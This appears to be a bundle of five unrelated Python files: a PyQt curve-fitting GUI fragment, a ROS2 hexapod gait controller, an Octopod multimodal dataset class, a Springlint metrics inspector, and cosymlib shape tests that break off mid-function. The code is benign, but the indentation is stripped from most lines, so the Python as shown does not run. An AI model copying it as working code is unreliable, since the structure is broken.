        # Stop the fitting thread
self.workthread.terminate()
self.workthread.wait()
if not self.autofit:
self.pushButton.setDisabled(False)
self.pushButton_2.setDisabled(True)
def showfitoption(self):
        # Bind the stackedWidget page to the selected fitting mode
self.stackedWidget.setCurrentIndex(self.comboBox_3.currentIndex())
def showfunction(self):
        # Set the label to a string describing the current equation
self.findfitmod()
text = show_function(self.fitmod)[7:]
label = self.findlabel[str(self.fitmod[0])]
label.setToolTip(text)
room = int(label.width() / 5.5)
if len(text) > room:
text = text[:room - 4] + '...'
label.setText(text)
def printresult(self):
        # Print the fitting result
if self.fitmod[0] == 0:
text_func = "f({}) = ".format(self.fitmod[1][1]) + self.fitmod[1][2]
else:
text_func = show_function(self.fitmod)
if self.fitmod[0] == 4:
for i in range(self.fitmod[1] + 2):
text_func = text_func.replace("p{}".format(i + 1), str(round(self.p[self.fitmod[1] + 1 - i], 2)))
else:
for i in range(len(self.para)):
text_func = text_func.replace(self.para_names[i], str(round(self.para[i], 2)))
print(text_func)
def printfigure(self):
try:
if self.language == "zh_CN":
plt.rcParams['font.sans-serif'] = 'SimHei'
plt.rcParams['axes.unicode_minus'] = False
xx = (self.x.min(), self.x.max())
plt.plot(np.linspace(xx[0], xx[1], 200), self.p(np.linspace(xx[0], xx[1], 200), *self.para))
plt.scatter(self.x, self.y, c='k')
plt.gcf().set_facecolor(np.ones(3) * 240 / 255)
plt.grid()
if self.Xlabel:
self.text1 = self.Xlabel
if self.Ylabel:
self.text2 = self.Ylabel
plt.legend([self.lineEdit.text(), "{} vs. {}".format(self.text2, self.text1)])
plt.title(self.lineEdit.text())
plt.xlabel(self.text1)
plt.ylabel(self.text2)
plt.show()
except Exception as e:
self.messege(repr(e))
def savefigure(self):
fileName, fileType = QtWidgets.QFileDialog.getSaveFileName(self,
"保存文件" if self.language == "zh_CN" else "Save file",
os.getcwd(),
"Portable Network Graphics(*.png);;Joint Photographic Group(*.jpg);;All Files(*)")
if fileName:
self.sc.axes.figure.savefig(fileName, dpi=300)
def action_autofit(self):
if self.checkBox.isChecked():
self.checkBox.setChecked(False)
self.action_12.setIconVisibleInMenu(False)
else:
self.checkBox.setChecked(True)
self.action_12.setIconVisibleInMenu(True)
def closeEvent(self, event):
config = configparser.ConfigParser()
config['DEFAULT'] = {"language": self.language, "autofit": str(self.checkBox.isChecked())}
with open(os.path.expanduser('~') + os.sep + 'curvefitting.ini', 'w') as configfile:
config.write(configfile)
event.accept()
def inputtitle(self):
self.inputwindow_title.lineEdit.setText(self.lineEdit.text())
self.inputwindow_title.show()
def inputtitleback(self):
title = self.inputwindow_title.inputvalue
if title:
self.lineEdit.setText(title)
def inputXlabel(self):
if self.Xlabel:
self.inputwindow_xlabel.lineEdit.setText(self.Xlabel)
else:
self.inputwindow_xlabel.lineEdit.setText(self.comboBox.currentText())
self.inputwindow_xlabel.show()
def inputXlabelback(self):
xlabel = self.inputwindow_xlabel.inputvalue
if xlabel:
self.Xlabel = xlabel
def inputYlabel(self):
if self.Ylabel:
self.inputwindow_ylabel.lineEdit.setText(self.Ylabel)
else:
self.inputwindow_ylabel.lineEdit.setText(self.comboBox_2.currentText())
self.inputwindow_ylabel.show()
def inputYlabelback(self):
ylabel = self.inputwindow_ylabel.inputvalue
if ylabel:
self.Ylabel = ylabel
def renew_xylabel(self):
self.Xlabel = None
self.Ylabel = None
def clear(self):
self.comboBox.setCurrentIndex(0)
self.comboBox_2.setCurrentIndex(0)
self.comboBox_3.setCurrentIndex(0)
self.comboBox_4.setCurrentIndex(0)
self.sc.clear()
self.renew_xylabel()
self.translate(self.language, nomatter=True)
del self.x, self.y, self.p, self.text1, self.text2
class WorkThread(QtCore.QThread):
    # Worker thread dedicated to fitting
trigger = QtCore.pyqtSignal()
def __init__(self, myui):
super(WorkThread, self).__init__()
[self.ui] = myui
def run(self):
self.ui.successfit = False
try:
self.ui.p, self.ui.para, self.ui.para_names = fit(self.ui.x.squeeze(), self.ui.y.squeeze(), mod=self.ui.fitmod)
except Exception as e:
self.ui.e = repr(e)
else:
self.ui.successfit = True
self.trigger.emit()
class Aboutwindow(QtWidgets.QWidget, Ui_aboutWindow):
def __init__(self, parent=None):
super(Aboutwindow, self).__init__(parent)
self.setupUi(self)
self.translator = QtCore.QTranslator()
def translate(self, language):
self.translator.load(language_path + "about_{}.qm".format(language))
_app = QtWidgets.QApplication.instance()
_app.installTranslator(self.translator)
self.retranslateUi(self)
class Helpwindow(QtWidgets.QWidget, Ui_helpWindow):
def __init__(self, parent=None):
super(Helpwindow, self).__init__(parent)
self.setupUi(self)
self.translator = QtCore.QTranslator()
def translate(self, language):
self.translator.load(language_path + "help_{}.qm".format(language))
_app = QtWidgets.QApplication.instance()
_app.installTranslator(self.translator)
self.retranslateUi(self)
class Inputwindow(QtWidgets.QWidget, Ui_inputWindow):
def __init__(self, parent=None):
super(Inputwindow, self).__init__(parent)
self.setupUi(self)
self.translator = QtCore.QTranslator()
self.inputvalue = None
self.pushButton.clicked.connect(self.OK)
self.pushButton_2.clicked.connect(self.close)
def OK(self):
self.inputvalue = self.lineEdit.text()
self.close()
def translate(self, language):
self.translator.load(language_path + "input_{}.qm".format(language))
_app = QtWidgets.QApplication.instance()
_app.installTranslator(self.translator)
self.retranslateUi(self)
|
#!/usr/bin/env python3
# Reference:
# https://github.com/ros2/examples/tree/master/rclpy/actions
from action_msgs.msg import GoalStatus
from hapthexa_msgs.action import MoveLeg
from hapthexa_msgs.msg import ForceSensor
from hapthexa_msgs.msg import Empty
from hapthexa_msgs.action import Gait
import math
import threading
import time
import sys
import rclpy
from rclpy.action import ActionServer, ActionClient, CancelResponse, GoalResponse
from rclpy.callback_groups import ReentrantCallbackGroup
from rclpy.executors import MultiThreadedExecutor
from rclpy.node import Node
from rclpy.task import Future
# phase = 0
# def forcesensor_callback(msg, node):
# # node.get_logger().info('{0}'.format(msg.z))
# if phase == 2 and msg.radial_magnitude > 0.3:
# node.get_logger().info('z detected')
# future = goal_handle.cancel_goal_async()
# future.add_done_callback(lambda future: cancel_done(node, future))
# global once_failed
# once_failed = True
# def cancel_done(node, future):
# cancel_response = future.result()
# if len(cancel_response.goals_canceling) > 0:
# node.get_logger().info('Goal successfully canceled')
# else:
# node.get_logger().info('Goal failed to cancel')
class EachLegGait(Node):
def __init__(self, namespace: str = None):
super().__init__('each_leg_gait', namespace=namespace)
self._gait_action_server = ActionServer(
self,
Gait,
'gait',
execute_callback=self.execute_callback,
callback_group=ReentrantCallbackGroup(),
goal_callback=self.goal_callback,
cancel_callback=self.cancel_callback)
self._calibrate_signal_pub = self.create_publisher(Empty, 'calibrate_signal', 10)
self._move_leg_action_client = ActionClient(self, MoveLeg, 'move_leg')
self._forcesensor_sub = self.create_subscription(ForceSensor, 'force_sensor', self.forcesensor_callback, 10)
# self._timer = self.create_timer(0.001, lambda: self.get_logger().info('timer'))
self._leg_stop_condition = (lambda: False)
self._leg_stoped = False
self._move_leg_goal_handle = None
self._forcesensor_msg = None
self._x_result = 0.0
self._y_result = 0.0
self._z_result = 0.0
self._z_lock = 0.0
self._x_offset = 0
self._z_offset = 0.0
self._timer_start = time.time()
def goal_callback(self, goal_request):
"""Accept or reject a client request to begin an action."""
# This server allows multiple goals in parallel
self.get_logger().debug('Received goal request')
return GoalResponse.ACCEPT
def cancel_callback(self, goal_handle):
"""Accept or reject a client request to cancel an action."""
self.get_logger().debug('Received cancel request')
return CancelResponse.ACCEPT
async def execute_callback(self, goal_handle):
"""Execute a goal."""
self.get_logger().debug('Executing goal...')
w = 5.0 if math.isclose(goal_handle.request.w,0.0) else goal_handle.request.w
h = 5.0 if math.isclose(goal_handle.request.h,0.0) else goal_handle.request.h
hmax = 12.0 if math.isclose(goal_handle.request.hmax,0.0) else goal_handle.request.hmax
hmin = -12.0 if math.isclose(goal_handle.request.hmin,0.0) else goal_handle.request.hmin
phase = goal_handle.request.phase
self._z_offset = goal_handle.request.z_offset
self.get_logger().debug('phase={0}'.format(phase))
if goal_handle.request.is_swingleg:
if phase == 1:
self.move_leg_and_wait(-w/2+self._x_offset, 0, h+self._z_lock)
self._calibrate_signal_pub.publish(Empty())
elif phase == 2:
if self.move_leg_and_wait( w/2+self._x_offset, 0, h+self._z_lock, lambda: self._forcesensor_msg.piezo > 0.5 or self._forcesensor_msg.radial_magnitude > 0.2):
self.get_logger().warn('Wall detected. retrying...')
self.move_leg_and_wait(-w/2+self._x_offset, 0, hmax+self._z_lock)
self._calibrate_signal_pub.publish(Empty())
if self.move_leg_and_wait( w/2+self._x_offset, 0, hmax+self._z_lock, lambda: self._forcesensor_msg.piezo > 0.5 or self._forcesensor_msg.radial_magnitude > 0.2):
self.get_logger().warn('Wall detected twice. stop')
rclpy.shutdown()
sys.exit()
elif phase == 3:
if not self.move_leg_and_wait( w/2+self._x_offset, 0, hmin, lambda: self._forcesensor_msg.piezo > 0.5 or self._forcesensor_msg.radial_magnitude > 0.2):
self.get_logger().warn('Cannot ground. retrying...(1)')
self.move_leg_and_wait(w/2+self._x_offset, 0, h+self._z_lock)
self._x_offset = -3 if self._x_offset == 3 else self._x_offset + 3
                    self.move_leg_and_wait( w/2+self._x_offset, 0, h+self._z_lock)  # phase 2 motion
if not self.move_leg_and_wait( w/2+self._x_offset, 0, hmin, lambda: self._forcesensor_msg.piezo > 0.5 or self._forcesensor_msg.radial_magnitude > 0.2):
self.get_logger().warn('Cannot ground. retrying...(2)')
self.move_leg_and_wait(w/2+self._x_offset, 0, h+self._z_lock)
self._x_offset = -3 if self._x_offset == 3 else self._x_offset + 3
                        self.move_leg_and_wait( w/2+self._x_offset, 0, h+self._z_lock)  # phase 2 motion
if not self.move_leg_and_wait( w/2+self._x_offset, 0, hmin, lambda: self._forcesensor_msg.piezo > 0.5 or self._forcesensor_msg.radial_magnitude > 0.2):
self.get_logger().warn('Cannot ground. stop')
rclpy.shutdown()
sys.exit()
self._z_lock = self._z_result
else:
self.move_leg_and_wait( w/2+self._x_offset, 0, self._z_lock)
self.move_leg_and_wait(-w/2+self._x_offset, 0, self._z_lock)
self.move_leg_and_wait(-w/2+self._x_offset, 0, self._z_lock)
goal_handle.succeed()
self.get_logger().debug('Action succeed')
result = Gait.Result()
result.x = self._x_result
result.y = self._y_result
result.z = self._z_result
return result
def move_leg_and_wait(self, x, y, z, stop_condition=(lambda: False)):
self._move_leg_action_client.wait_for_server()
goal_msg = MoveLeg.Goal()
goal_msg.x = float(x)
goal_msg.y = float(y)
goal_msg.z = float(z+self._z_offset)
goal_msg.relative_mode = True
send_goal_future = self._move_leg_action_client.send_goal_async(goal_msg)
# rclpy.spin_until_future_complete(self, send_goal_future)
while not send_goal_future.done():
time.sleep(0.01)
self._move_leg_goal_handle = send_goal_future.result()
self._leg_stop_condition = stop_condition
self._leg_stoped = False
self._timer_start = time.time()
get_result_future = self._move_leg_goal_handle.get_result_async()
# rclpy.spin_until_future_complete(self, get_result_future)
while not get_result_future.done():
time.sleep(0.01)
result = get_result_future.result().result
self._x_result = result.x
self._y_result = result.y
self._z_result = result.z
self.get_logger().debug('z={0}'.format(self._z_result))
self._move_leg_goal_handle = None
self._leg_stop_condition = (lambda: False)
return self._leg_stoped
def forcesensor_callback(self, msg):
self._forcesensor_msg = msg
if self._move_leg_goal_handle is not None and not self._leg_stoped and self._leg_stop_condition():
self.get_logger().debug('{0}'.format(msg.z))
future = self._move_leg_goal_handle.cancel_goal_async()
future.add_done_callback(lambda future: self.cancel_done(future))
self._leg_stoped = True
def cancel_done(self, future):
cancel_response = future.result()
if len(cancel_response.goals_canceling) > 0:
self.get_logger().info('Goal successfully canceled')
else:
self.get_logger().info('Goal failed to cancel')
class RoughWalk(Node):
def __init__(self):
super().__init__('roughwalk',namespace='hapthexa')
self._leg_names = ['front_left', 'middle_left', 'rear_left', 'rear_right', 'middle_right', 'front_right']
self._gait_action_clients = []
for leg_name in self._leg_names:
self._gait_action_clients.append(ActionClient(self, Gait, 'leg/'+leg_name+'/gait'))
self._leg_group1 = []
self._leg_group2 = []
for i in range(len(self._leg_names)):
if i % 2:
self._leg_group1.append(self._leg_names[i])
else:
self._leg_group2.append(self._leg_names[i])
self.get_logger().debug('{0}'.format(len(self._leg_names)))
self._send_goal_futures = [Future]*len(self._leg_names)
self._get_result_futures = [Future]*len(self._leg_names)
self._executing_action = [False]*len(self._leg_names)
self._move_leg_action_client = ActionClient(self, MoveLeg, 'leg/front_left/move_leg')
self._z_offset = 0
self._walk_thread = threading.Thread(target=self.walk_thread)
self._walk_thread.start()
def walk_thread(self):
while rclpy.ok():
self.walk(True)
self.walk(False)
def walk(self, is_group1_true: bool=True):
for i in range(len(self._leg_names)):
self._gait_action_clients[i].wait_for_server()
msg = Gait.Goal()
msg.z_offset = float(self._z_offset)
# msg.is_swingleg = is_group1_true
# self.execute_gait(0, msg)
# self.execute_gait(2, msg)
# self.execute_gait(4, msg)
# msg.is_swingleg = not is_group1_true
# self.execute_gait(1, msg)
# self.execute_gait(3, msg)
# self.execute_gait(5, msg)
# self.wait_for_gait()
self.get_logger().debug('group1' if is_group1_true else 'group2')
if is_group1_true:
msg.is_swingleg = True
msg.phase = 1
self.execute_gait(0, msg)
self.execute_gait(2, msg)
self.execute_gait(4, msg)
self.wait_for_gait()
msg.is_swingleg = False
msg.phase = 0
self.execute_gait(1, msg)
self.execute_gait(3, msg)
self.execute_gait(5, msg)
self.wait_for_gait()
msg.is_swingleg = True
msg.phase = 2
self.execute_gait(0, msg)
self.execute_gait(2, msg)
self.execute_gait(4, msg)
self.wait_for_gait()
msg.is_swingleg = True
msg.phase = 3
self.execute_gait(0, msg)
self.execute_gait(2, msg)
self.execute_gait(4, msg)
self.wait_for_gait()
else:
msg.is_swingleg = True
msg.phase = 1
self.execute_gait(1, msg)
self.execute_gait(3, msg)
self.execute_gait(5, msg)
self.wait_for_gait()
msg.is_swingleg = False
msg.phase = 0
self.execute_gait(0, msg)
self.execute_gait(2, msg)
            self.execute_gait(4, msg)
            self.wait_for_gait()
msg.is_swingleg = True
msg.phase = 2
self.execute_gait(1, msg)
self.execute_gait(3, msg)
self.execute_gait(5, msg)
self.wait_for_gait()
msg.is_swingleg = True
msg.phase = 3
self.execute_gait(1, msg)
self.execute_gait(3, msg)
self.execute_gait(5, msg)
self.wait_for_gait()
if is_group1_true:
self._z_offset = -(self._get_result_futures[0].result().result.z+self._get_result_futures[2].result().result.z+self._get_result_futures[4].result().result.z)/3
else:
self._z_offset = -(self._get_result_futures[1].result().result.z+self._get_result_futures[3].result().result.z+self._get_result_futures[5].result().result.z)/3
def execute_gait(self, n, msg):
self._send_goal_futures[n] = self._gait_action_clients[n].send_goal_async(msg)
self._executing_action[n] = True
def wait_for_gait(self):
for i in range(len(self._leg_names)):
if self._executing_action[i]:
while not self._send_goal_futures[i].done():
time.sleep(0.01)
for i in range(len(self._leg_names)):
if self._executing_action[i]:
self._get_result_futures[i] = self._send_goal_futures[i].result().get_result_async()
for i in range(len(self._leg_names)):
if self._executing_action[i]:
while not self._get_result_futures[i].done():
time.sleep(0.01)
self._executing_action[i] = False
def main(args=None):
rclpy.init(args=args)
leg_names = ['front_left', 'middle_left', 'rear_left', 'rear_right', 'middle_right', 'front_right']
    executor = MultiThreadedExecutor(num_threads=8)  # 6 threads for the EachLegGait nodes + 1 for the RoughWalk node + 1 spare
for leg_name in leg_names:
executor.add_node(EachLegGait(namespace='hapthexa/leg/'+leg_name))
executor.add_node(RoughWalk())
executor.spin()
rclpy.shutdown()
if __name__ == '__main__':
main()
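# Hedged usage sketch (illustrative only): sending one Gait goal to a single leg
# from another node. The action name and goal fields mirror the ones RoughWalk
# uses above; nothing here is part of the original launch flow.
#
# node = rclpy.create_node('gait_client')
# client = ActionClient(node, Gait, 'hapthexa/leg/front_left/gait')
# client.wait_for_server()
# goal = Gait.Goal()
# goal.is_swingleg = True
# goal.phase = 1
# goal.z_offset = 0.0
# future = client.send_goal_async(goal)
# rclpy.spin_until_future_complete(node, future)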
|
import numpy as np
from PIL import Image
import torch
from torch.utils.data import Dataset
from octopod.vision.config import cropped_transforms, full_img_transforms
from octopod.vision.helpers import center_crop_pil_image
class OctopodEnsembleDataset(Dataset):
"""
Load image and text data specifically for an ensemble model
Parameters
----------
text_inputs: pandas Series
the text to be used
img_inputs: pandas Series
the paths to images to be used
y: list
A list of lists of dummy-encoded categories
tokenizer: pretrained BERT Tokenizer
BERT tokenizer likely from `transformers`
max_seq_length: int (defaults to 128)
Maximum number of tokens to allow
transform: str or list of PyTorch transforms
        specifies how to preprocess the full image for an Octopod image model
To use the built-in Octopod image transforms, use the strings: `train` or `val`
To use custom transformations supply a list of PyTorch transforms.
crop_transform: str or list of PyTorch transforms
        specifies how to preprocess the center-cropped image for an Octopod image model
To use the built-in Octopod image transforms, use strings `train` or `val`
To use custom transformations supply a list of PyTorch transforms.
"""
def __init__(self,
text_inputs,
img_inputs,
y,
tokenizer,
max_seq_length=128,
transform='train',
crop_transform='train'):
self.text_inputs = text_inputs
self.img_inputs = img_inputs
self.y = y
self.tokenizer = tokenizer
self.max_seq_length = max_seq_length
        if transform in ('train', 'val'):
self.transform = full_img_transforms[transform]
else:
self.transform = transform
        if crop_transform in ('train', 'val'):
self.crop_transform = cropped_transforms[crop_transform]
else:
self.crop_transform = crop_transform
def __getitem__(self, index):
"""Return dict of PyTorch tensors for preprocessed images and text and tensor of labels"""
# Text processing
x_text = self.text_inputs[index].replace('\n', ' ').replace('\r', ' ')
tokenized_x = (
['[CLS]']
+ self.tokenizer.tokenize(x_text)[:self.max_seq_length - 2]
+ ['[SEP]']
)
input_ids = self.tokenizer.convert_tokens_to_ids(tokenized_x)
padding = [0] * (self.max_seq_length - len(input_ids))
input_ids += padding
assert len(input_ids) == self.max_seq_length
bert_text = torch.from_numpy(np.array(input_ids))
# Image processing
full_img = Image.open(self.img_inputs[index]).convert('RGB')
cropped_img = center_crop_pil_image(full_img)
full_img = self.transform(full_img)
cropped_img = self.crop_transform(cropped_img)
y_output = torch.from_numpy(np.array(self.y[index])).long()
return {'bert_text': bert_text,
'full_img': full_img,
'crop_img': cropped_img}, y_output
def __len__(self):
return len(self.text_inputs)
class OctopodEnsembleDatasetMultiLabel(OctopodEnsembleDataset):
"""
Multi label subclass of OctopodEnsembleDataset
Parameters
----------
text_inputs: pandas Series
the text to be used
img_inputs: pandas Series
the paths to images to be used
y: list
a list of binary encoded categories with length equal to number of
classes in the multi-label task. For a 4 class multi-label task
a sample list would be [1,0,0,1]
tokenizer: pretrained BERT Tokenizer
BERT tokenizer likely from `transformers`
max_seq_length: int (defaults to 128)
Maximum number of tokens to allow
transform: str or list of PyTorch transforms
        specifies how to preprocess the full image for an Octopod image model
To use the built-in Octopod image transforms, use the strings: `train` or `val`
To use custom transformations supply a list of PyTorch transforms.
crop_transform: str or list of PyTorch transforms
        specifies how to preprocess the center-cropped image for an Octopod image model
To use the built-in Octopod image transforms, use strings `train` or `val`
To use custom transformations supply a list of PyTorch transforms.
"""
def __getitem__(self, index):
"""Return dict of PyTorch tensors for preprocessed images and text and tensor of labels"""
# Text processing
x_text = self.text_inputs[index].replace('\n', ' ').replace('\r', ' ')
tokenized_x = (
['[CLS]']
+ self.tokenizer.tokenize(x_text)[:self.max_seq_length - 2]
+ ['[SEP]']
)
input_ids = self.tokenizer.convert_tokens_to_ids(tokenized_x)
padding = [0] * (self.max_seq_length - len(input_ids))
input_ids += padding
assert len(input_ids) == self.max_seq_length
bert_text = torch.from_numpy(np.array(input_ids))
# Image processing
full_img = Image.open(self.img_inputs[index]).convert('RGB')
cropped_img = center_crop_pil_image(full_img)
full_img = self.transform(full_img)
cropped_img = self.crop_transform(cropped_img)
y_output = torch.FloatTensor(self.y[index])
return {'bert_text': bert_text,
'full_img': full_img,
'crop_img': cropped_img}, y_output
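# Hedged usage sketch (illustrative only): the tokenizer name, column names and
# image path below are assumptions for the example, not part of this module.
#
# import pandas as pd
# from transformers import BertTokenizer
#
# df = pd.DataFrame({'text': ['a red dress'],
#                    'image_loc': ['images/0001.jpg'],
#                    'label': [[1, 0, 0]]})
# tokenizer = BertTokenizer.from_pretrained('bert-base-uncased')
# dataset = OctopodEnsembleDataset(text_inputs=df['text'],
#                                  img_inputs=df['image_loc'],
#                                  y=df['label'].tolist(),
#                                  tokenizer=tokenizer,
#                                  transform='val',
#                                  crop_transform='val')
# inputs, target = dataset[0]  # dict with 'bert_text', 'full_img', 'crop_img'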
|
import json
import logging
import re
from pathlib import Path
from shutil import copy
from typing import AnyStr, List, Optional, Dict, Any
from src.python.review.common.file_system import new_temp_dir
from src.python.review.common.subprocess_runner import run_in_subprocess
from src.python.review.inspectors.base_inspector import BaseInspector
from src.python.review.inspectors.inspector_type import InspectorType
from src.python.review.inspectors.issue import BaseIssue, ChildrenNumberIssue, ClassResponseIssue, CodeIssue, \
CohesionIssue, \
CouplingIssue, InheritanceIssue, IssueType, MethodNumberIssue, WeightedMethodIssue, IssueData
from src.python.review.inspectors.tips import get_child_number_tip, get_class_coupling_tip, get_class_response_tip, \
get_cohesion_tip, get_inheritance_depth_tip, get_method_number_tip, get_weighted_method_tip
PATH_TOOLS_SPRINGLINT_FILES = Path(__file__).parent / 'files'
PATH_SPRINGLINT_JAR = PATH_TOOLS_SPRINGLINT_FILES / 'springlint-0.6.jar'
SPRINGLINT_OUTPUT_NAME = 'springlint-result.html'
logger = logging.getLogger(__name__)
class SpringlintInspector(BaseInspector):
inspector_type = InspectorType.SPRINGLINT
metric_name_to_property = {
'dit': 'inheritance_tree_depth',
'noc': 'children_number',
'wmc': 'weighted_method',
'cbo': 'class_objects_coupling',
'lcom': 'cohesion_lack',
'rfc': 'class_response',
'nom': 'method_number'
}
metric_name_to_description = {
'dit': get_inheritance_depth_tip(),
'noc': get_child_number_tip(),
'wmc': get_weighted_method_tip(),
'cbo': get_class_coupling_tip(),
'lcom': get_cohesion_tip(),
'rfc': get_class_response_tip(),
'nom': get_method_number_tip()
}
metric_name_to_issue_type = {
'dit': IssueType.INHERITANCE_DEPTH,
'noc': IssueType.CHILDREN_NUMBER,
'wmc': IssueType.WEIGHTED_METHOD,
'cbo': IssueType.COUPLING,
'lcom': IssueType.COHESION,
'rfc': IssueType.CLASS_RESPONSE,
'nom': IssueType.METHOD_NUMBER
}
@classmethod
def _create_command(cls, path: Path, output_path: Path) -> List[str]:
return [
'java', '-jar',
PATH_SPRINGLINT_JAR,
'--output', str(output_path),
'-otype', 'html',
'--project', str(path)
]
def inspect(self, path: Path, config: dict) -> List[BaseIssue]:
with new_temp_dir() as temp_dir:
if path.is_file():
return self._inspect_file(path, temp_dir)
else:
return self._inspect_project(path, temp_dir)
@classmethod
def _inspect_project(cls, path: Path, temp_dir: Path) -> List[BaseIssue]:
output_path = temp_dir / SPRINGLINT_OUTPUT_NAME
command = cls._create_command(path, temp_dir)
run_in_subprocess(command)
return cls._parse(output_path)
@classmethod
def _inspect_file(cls, path: Path, temp_dir: Path) -> List[BaseIssue]:
output_path = temp_dir / SPRINGLINT_OUTPUT_NAME
copy(str(path), str(temp_dir))
command = cls._create_command(temp_dir, temp_dir)
run_in_subprocess(command)
return cls._parse(output_path, str(path))
@classmethod
def _parse(cls, output_path: Path, origin_path: str = '') -> List[BaseIssue]:
if not output_path.is_file():
logger.error('%s: error - no output file' % cls.inspector_type.value)
return []
with open(str(output_path)) as out_file:
file_content = out_file.read()
issues: List[BaseIssue] = cls._parse_smells(file_content, origin_path)
issues.extend(cls._parse_metrics(file_content, origin_path))
return issues
@classmethod
def _parse_smells(cls, file_content: AnyStr, origin_path: str = '') -> List[BaseIssue]:
smells_re = re.compile(r'var smells=([^;]*);', re.S)
smells_string = smells_re.findall(file_content)[0]
smells = json.JSONDecoder().decode(smells_string)
issues: List[BaseIssue] = []
for file_smell in smells:
if origin_path:
file_path = origin_path
else:
file_path = file_smell['file']
issues.extend([CodeIssue(
file_path=Path(file_path),
line_no=1,
column_no=1,
origin_class=smell['name'],
inspector_type=cls.inspector_type,
type=IssueType.ARCHITECTURE,
description=smell['description']
) for smell in file_smell['smells']])
return issues
@classmethod
def _parse_metrics(cls, file_content: AnyStr, origin_path: str = '') -> List[BaseIssue]:
metrics_re = re.compile(r'var classes =([^;]*);', re.S)
metrics_string = metrics_re.findall(file_content)[0]
type_metrics_list = json.loads(metrics_string).items()
issues: List[BaseIssue] = []
for metrics_list in type_metrics_list:
for metrics in metrics_list[1]:
for metric_name in metrics:
if metric_name not in cls.metric_name_to_property:
continue
if origin_path:
file_path = origin_path
else:
file_path = metrics['file']
issues.append(cls._create_issue(metric_name,
metrics[metric_name],
Path(file_path)))
return issues
@classmethod
def _create_issue(cls, metric_name: str,
metric_value: int, path: Path) -> Optional[BaseIssue]:
property_name = cls.metric_name_to_property[metric_name]
issue_data = cls._get_common_issue_data(path)
issue_data[property_name] = metric_value
issue_data['description'] = cls.metric_name_to_description[metric_name]
issue_data['type'] = cls.metric_name_to_issue_type[metric_name]
if metric_name == 'dit':
return InheritanceIssue(**issue_data)
if metric_name == 'noc':
return ChildrenNumberIssue(**issue_data)
if metric_name == 'wmc':
return WeightedMethodIssue(**issue_data)
if metric_name == 'cbo':
return CouplingIssue(**issue_data)
if metric_name == 'lcom':
return CohesionIssue(**issue_data)
if metric_name == 'rfc':
return ClassResponseIssue(**issue_data)
if metric_name == 'nom':
return MethodNumberIssue(**issue_data)
return None
@classmethod
def _get_common_issue_data(cls, file: Path) -> Dict[str, Any]:
return IssueData.get_base_issue_data_dict(file, cls.inspector_type)
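# Hedged usage sketch (illustrative only; the project path is hypothetical and
# running the inspector requires Java plus the bundled springlint-0.6.jar):
#
# issues = SpringlintInspector().inspect(Path('/path/to/spring-project'), config={})
# for issue in issues:
#     print(issue.file_path, issue.type, issue.description)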
|
<filename>tests/test_shape.py
import unittest
import numpy as np
from cosymlib import Cosymlib
from cosymlib.file_io import classic_inputs
from cosymlib import file_io
import cosymlib.shape as shape
import cosymlib.shape.maps as maps
import os
data_dir = os.path.join(os.path.dirname(__file__), 'data')
class TestShape(unittest.TestCase):
def test_example01(self):
molecules, options = classic_inputs.read_old_input(data_dir + '/shape/example01.dat')
reference_polyhedron = []
for number in options['%labels']:
reference_polyhedron.append(shape.tools.get_shape_label(int(number), options['%n_atoms']))
results = [[shape.Shape(molecule).measure(reference_polyhedron[0], central_atom=options['%central_atom'])
for molecule in molecules],
[shape.Shape(molecule).measure(reference_polyhedron[1], central_atom=options['%central_atom'])
for molecule in molecules]]
calculated_results = np.column_stack((results[0], results[1]))
nice_measures = [[31.375, 0.97], [33.44, 0.16]]
self.assertTrue(np.allclose(nice_measures, calculated_results, atol=1e-3))
def test_example02(self):
nice_measures = [[5.271, 36.847],
[5.184, 36.789],
[5.047, 36.698],
[5.234, 36.822],
[5.1, 36.733]]
molecules, options = classic_inputs.read_old_input(data_dir + '/shape/example02.dat')
reference_polyhedron = []
for number in options['%labels']:
reference_polyhedron.append(shape.tools.get_shape_label(int(number), options['%n_atoms']))
results = [[shape.Shape(molecule).measure(reference_polyhedron[0], options['%central_atom'])
for molecule in molecules],
[shape.Shape(molecule).measure(reference_polyhedron[1], options['%central_atom'])
for molecule in molecules]]
calculated_results = np.column_stack((results[0], results[1]))
self.assertTrue(np.allclose(nice_measures, calculated_results, atol=1e-3))
def test_example03(self):
nice_measures = [[31.375, 0.97],
[33.44, 0.16]]
molecules, options = classic_inputs.read_old_input(data_dir + '/shape/example03.dat')
reference_polyhedron = []
for number in options['%labels']:
reference_polyhedron.append(shape.tools.get_shape_label(int(number), options['%n_atoms']))
results = []
for reference in reference_polyhedron:
results.append([shape.Shape(molecule).measure(reference, central_atom=options['%central_atom'])
for molecule in molecules])
calculated_results = np.column_stack((results[0], results[1]))
self.assertTrue(np.allclose(nice_measures, calculated_results, atol=1e-3))
def test_example04(self):
nice_measures = [[31.375, 0.97],
[33.44, 0.16]]
nice_structures = [[2.63702000e+00, 9.00254000e+00, 1.50230800e+01],
[4.04611899e+00, 8.76816018e+00, 1.39529277e+01],
[2.90730181e+00, 8.13748396e+00, 1.65607229e+01],
[1.17328859e+00, 8.36062228e+00, 1.42286293e+01],
[2.42137060e+00, 1.07438936e+01, 1.53500401e+01],
[-3.47837193e-17, -9.20929468e-18, 2.51183874e-17],
[3.77908106e-01, 9.50150647e-01, -8.46343078e-01],
[-3.77908106e-01, -9.50150647e-01, 8.46343078e-01],
[-1.14966271e+00, 6.33326997e-01, 1.97661211e-01],
[1.14966271e+00, -6.33326997e-01, -1.97661211e-01],
[2.63702000e+00, 9.00254000e+00, 1.50230800e+01],
[3.76728743e+00, 7.46687014e+00, 1.40425715e+01],
[4.02414490e+00, 8.97967996e+00, 1.66578721e+01],
[1.24989510e+00, 9.02540004e+00, 1.33882879e+01],
[1.50675257e+00, 1.05382099e+01, 1.60035885e+01],
[9.74091060e-17, 1.01739088e-17, -5.98080786e-17],
[5.66862241e-01, 1.42522607e+00, -1.26951447e+00],
[-5.66862241e-01, -1.42522607e+00, 1.26951447e+00],
[-1.72449417e+00, 9.49990377e-01, 2.96491640e-01],
[1.72449417e+00, -9.49990377e-01, -2.96491640e-01]]
molecules, options = classic_inputs.read_old_input(data_dir + '/shape/example04.dat')
reference_polyhedron = []
for number in options['%labels']:
reference_polyhedron.append(shape.tools.get_shape_label(int(number), options['%n_atoms']))
results = [[shape.Shape(molecule).structure(reference_polyhedron[0], central_atom=options['%central_atom'])
for molecule in molecules]]
calculated_results = np.concatenate((results[0][0], results[0][1]))
results.append([shape.Shape(molecule).structure(reference_polyhedron[1], central_atom=options['%central_atom'])
for molecule in molecules])
calculated_results = np.concatenate((calculated_results, np.concatenate((results[1][0], results[1][1]))))
results = []
